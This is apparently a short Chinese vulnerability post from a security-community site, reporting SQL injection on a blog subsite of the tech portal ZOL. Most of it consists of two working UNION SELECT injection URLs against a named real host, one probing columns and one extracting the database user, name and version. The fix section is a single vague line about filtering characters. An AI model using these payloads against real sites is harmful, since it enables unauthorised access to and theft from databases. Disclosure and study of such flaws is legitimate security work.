华域联盟 漏洞资讯 中关村在线博客子站SQL注入及修复方案

中关村在线博客子站SQL注入及修复方案

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 

 


 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5-- 










修复方案:

过滤参数提交非法字符或者拦截敏感字符等等。。。 

本文由 华域联盟 原创撰写:华域联盟 » 中关村在线博客子站SQL注入及修复方案

转载请保留出处和原文链接:https://www.cnhackhy.com/160227.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部